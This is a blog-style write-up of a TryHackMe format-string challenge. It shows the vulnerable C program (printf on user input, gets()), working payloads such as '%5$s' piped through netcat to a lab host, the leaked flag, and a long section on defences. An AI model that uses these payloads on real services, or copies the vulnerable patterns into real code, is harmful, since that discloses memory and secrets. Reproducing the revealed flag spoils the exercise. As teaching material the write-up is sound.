August 25, 2025
14 Views
Welcome

Deep Dive into Format String Vulnerabilities: From Principles to Practical Exploitation

Format string vulnerabilities are a classic type of memory safety vulnerability, primarily occurring when developers fail to properly handle user input when using printf family functions. This article analyzes the attack principle, memory mechanism, and practical exploitation techniques of this vulnerability through a real-world example from the TryHackMe platform.

Format String Vulnerability Deep Dive: From Principle to Practical Exploitation

Flag: THM{format_issues}

Overview

A format string vulnerability is a classic memory safety vulnerability that primarily occurs when developers fail to properly handle user input when using printf family functions. This article, through a practical case from the TryHackMe platform, deeply analyzes the attack principle, memory mechanism, and practical exploitation techniques of this vulnerability.

Format String Vulnerability Principle

Vulnerability Cause

The root cause of format string vulnerabilities lies in the design mechanism of the printf family functions:

Parameter Count Mismatch: The printf function cannot verify at compile time whether the format string and the number of parameters match.

Stack Memory Access: When the number of format specifiers in the format string exceeds the number of parameters provided, the function continues to read data from the stack.

Type Conversion Danger: Attackers can use specific format specifiers to force the function to interpret memory data in different types.

Internal Mechanism of the printf Function

When calling printf(format, arg1, arg2, ... ), the format string format is parsed character by character. When % is encountered, the value is retrieved from the parameter list according to the subsequent format specifier. If the number of format specifiers exceeds the number of parameters, the function continues to read from the next location on the stack.

Vulnerable Code Analysis

Let's delve into this vulnerable program:

c
1#include <stdio.h>
2#include <string.h>
3
4void print_banner(){
5    printf( "  ______ _          __      __         _ _   \n"
6        " |  ____| |         \\ \\    / /        | | |  \n"
7        " | |__  | | __ _  __ \\ \\  / /_ _ _   _| | |_ \n"
8        " |  __| | |/ _` |/ _` \\ \\/ / _` | | | | | __|\n"
9        " | |    | | (_| | (_| |\\  / (_| | |_| | | |_ \n"
10        " |_|    |_|\\__,_|\\__, | \\/ \\__,_|\\__,_|_|\\__|\n"
11        "                  __/ |                      \n"
12        "                 |___/                       \n"
13        "                                             \n"
14        "Version 2.1 - Fixed print_flag to not print the flag. Nothing you can do about it!\n"
15        "==================================================================\n\n"
16          );
17}
18
19void print_flag(char *username){
20        FILE *f = fopen("flag.txt","r");
21        char flag[200];
22
23        fgets(flag, 199, f);
24        //printf("%s", flag);
25    
26    //The user needs to be mocked for thinking they could retrieve the flag
27    printf("Hello, ");
28    printf(username);  // 🚨 Vulnerability: User input is directly used as a format string
29    printf(". Was version 2.0 too simple for you? Well I don't see no flags being shown now xD xD xD...\n\n");
30    printf("Yours truly,\nByteReaper\n\n");
31}
32
33void login(){
34    char username[100] = "";
35
36    printf("Username: ");
37    gets(username);  // 🚨 Buffer overflow risk: Input length is not checked
38
39    // The flag isn't printed anymore. No need for authentication
40    print_flag(username);
41}
42
43void main(){
44    setvbuf(stdin, NULL, _IONBF, 0);
45    setvbuf(stdout, NULL, _IONBF, 0);
46    setvbuf(stderr, NULL, _IONBF, 0);
47
48    // Start login process
49    print_banner();
50    login();
51
52    return;
53}

Key Vulnerability Analysis

1. Format String Vulnerability (Line 37)

c
1printf(username);  // Dangerous! Should use printf("%s", username);

Problem Analysis:

The username variable is directly passed to printf as a format string. Attackers can include format specifiers (such as %x, %s, %p, etc.) in their input. These format specifiers will cause printf to read additional data from the stack.

2. Buffer Overflow Risk (Line 46)

c
1gets(username);  // Dangerous function, deprecated

Problem Analysis:

The gets() function does not check the input length, which can lead to buffer overflow. The username array is only 100 bytes, and overly long input will overwrite other data on the stack.

3. Flag Data Leakage Opportunity (Lines 30-32)

c
1FILE *f = fopen("flag.txt","r");
2char flag[200];
3fgets(flag, 199, f);

Key Point:

The flag is read into the local variable flag[200]. Although it is commented out and not directly printed, the data is still in stack memory. This data can be accessed indirectly through the format string vulnerability.

Memory Layout and Attack Mechanism

Stack Memory Layout Analysis

When the print_flag function is called, the stack layout is roughly as follows:

text
1Stack Top (Low Address)
2├─ FILE *f (fopen return value)
3├─ char flag[200] (stores the read flag content)
4├─ ...other local variables...
5├─ Return Address
6├─ Saved EBP
7├─ char *username (passed parameter)
8└─ main function's stack frame
9Stack Bottom (High Address)

Stack Traversal Mechanism of Format String

When printf(username) is executed, if username is plain text, it will be output normally. In an attack scenario, if username contains format specifiers, printf will attempt to retrieve the corresponding parameters from the stack.

Parameter Position Calculation

In x86/x64 architectures, the first parameter is the format string itself (username), the second parameter is the next value on the stack, the third parameter is the next value after that, and so on. The Nth parameter is the value at the corresponding location on the stack.

Since the flag[200] array is on the stack, the flag content can be accessed through the appropriate offset.

Attack Vector Analysis

Payload Analysis

Successful attack payload:

bash
1echo -ne '%5$s' | nc 10.10.20.224 1337

Detailed Analysis:

%5$s directly accesses the value at the 5th parameter position. The $ syntax allows direct specification of the parameter position without traversing the preceding parameters. The s format specifier treats the value at that position as a string pointer and prints the content it points to.

Why the 5th Parameter?

By experimenting with different offsets:

bash
1# Example command to probe stack content
2echo -ne '%x %x %x %x %x %x %x %x %s' | nc 10.10.52.86 1337

After testing, it was found that the 1st-4th parameters are other data on the stack, the 5th parameter happens to point to the address of the flag string, and the 6th and subsequent parameters are other memory contents.

Impact of Memory Alignment

In real-world environments, the exact location of the flag on the stack may vary due to compiler optimization levels, stack alignment methods, system architecture (32-bit/64-bit), and the allocation of other local variables.

Therefore, it may be necessary to try different offsets (%4$s, %5$s, %6$s, etc.) to locate the flag.

Practical Attack Demonstration

Complete Process of a Successful Attack

bash
1$ echo -ne '%5$s' | nc 10.10.20.224 1337
2  ______ _          __      __         _ _   
3 |  ____| |         \ \    / /        | | |  
4 | |__  | | __ _  __ \ \  / /_ _ _   _| | |_ 
5 |  __| | |/ _` |/ _` \ \/ / _` | | | | | __|
6 | |    | | (_| | (_| |\  / (_| | |_| | | |_ 
7 |_|    |_|\__,_|\__, | \/ \__,_|\__,_|_|\__|
8                  __/ |                      
9                 |___/                       
10                                             
11Version 2.1 - Fixed print_flag to not print the flag. Nothing you can do about it!
12==================================================================
13
14Username: Hello, THM{format_issues}
15. Was version 2.0 too simple for you? Well I don't see no flags being shown now xD xD xD...
16
17Yours truly,
18ByteReaper

Analysis of Successful Attack Principle

Input payload: %5$s

printf processing: When the program executes printf(username), the content of username is %5$s. printf parses the format specifier %5$s, accesses the value at the 5th position on the stack as a string pointer, and the 5th position happens to point to the memory address of the flag string.

Output result: Successfully displays the flag content THM{format_issues}

Other probing payloads

Command for probing stack structure:

bash
1# Displays hexadecimal values of multiple stack locations
2echo -ne '%x %x %x %x %x %x %x %x %s' | nc 10.10.52.86 1337

This payload displays the hexadecimal values of the first eight stack locations and finally uses %s to attempt to print the ninth location as a string.

Key Elements of Vulnerability Exploitation

Format string vulnerability: printf(username) directly uses user input as the format string.

Sensitive data in memory: The flag is read into a local variable on the stack.

Predictable memory layout: The stack layout is relatively fixed in the same environment.

Direct position access: The %N$s syntax allows direct access to specific stack locations.

Protection Mechanisms and Security Recommendations

Code-Level Protection Measures

1. Safe printf Usage

c
1// Dangerous way
2printf(user_input);
3
4// Safe way
5printf("%s", user_input);

2. Input Validation and Length Check

c
1// Replace the dangerous gets() function
2char username[100];
3if (fgets(username, sizeof(username), stdin) != NULL) {
4    // Remove possible newline character
5    username[strcspn(username, "\n")] = '\0';
6}

3. Avoid Storing Sensitive Data on the Stack

c
1// Unsafe: Sensitive data on the stack
2void print_flag(char *username) {
3    char flag[200];  // On the stack, potentially leaked
4    // ...
5}
6
7// Safer: Use dynamic allocation or other protection mechanisms
8void print_flag(char *username) {
9    char *flag = malloc(200);
10    // Zero out and free immediately after use
11    memset(flag, 0, 200);
12    free(flag);
13}

Compiler-Level Protection

1. Compiler Warnings

bash
1# Enable format string related warnings
2gcc -Wformat -Wformat-security -Wall source.c

2. FORTIFY_SOURCE

bash
1# Enable runtime checks
2gcc -D_FORTIFY_SOURCE=2 -O2 source.c

System-Level Protection

1. Address Space Layout Randomization (ASLR)

Randomizes the memory addresses of the stack, heap, and libraries, making it difficult for attackers to predict the memory layout.

2. Stack Protection (Stack Canary)

bash
1# Enable stack protection
2gcc -fstack-protector-all source.c

3. Non-executable Stack (NX bit)

Prevents code execution on the stack, reducing the risk of code injection attacks.

Modern Protection Techniques

1. Control Flow Integrity (CFI)

Detects and prevents control flow hijacking attacks.

2. Address Space Isolation

Uses containerization or sandboxing techniques to isolate applications.

3. Static Analysis Tools

Uses tools such as Clang Static Analyzer, Coverity, etc., to find potential vulnerabilities during development.

Secure Development Recommendations

1. Secure Programming Principles

Principle of least privilege: Programs only obtain the necessary permissions.

Input validation: Strictly validate all external inputs.

Defensive programming: Assume all inputs are malicious.

2. Code Review

Focus on string handling functions, check the use of format strings, and verify buffer boundary checks.

3. Security Testing

Fuzzing: Use tools such as AFL, libFuzzer.

Static analysis: Integrate into CI/CD pipelines.

Dynamic analysis: Use Valgrind, AddressSanitizer, etc.

Summary

Format string vulnerabilities, while a classic security vulnerability, still exist in modern software development. Through the analysis in this article, we can see:

Vulnerability principle: Inherent flaws in the design of printf family functions.

Attack methods: Utilizing stack memory layout and format specifiers.

Protective measures: Multi-layered security protection strategies.

Key lessons include: Never use user input directly as a format string; sensitive data should be avoided from being stored in predictable memory locations; adopt multi-layered protection strategies, rather than relying on a single security mechanism; regularly conduct security code reviews and testing.

This case reminds us again that we must pay extra attention to memory safety when writing C/C++ programs, especially when handling user input. Modern compilers and operating systems provide various protection mechanisms, but the security awareness and programming habits of developers remain the most important first line of defense.

Enjoyed this article?

Share it with your friends and colleagues!

Welcome
Last updated: August 25, 2025
相关文章
正在检查服务状态...
Deep Dive into Format String Vulnerabilities: From Principles to Practical Exploitation - ICTRUN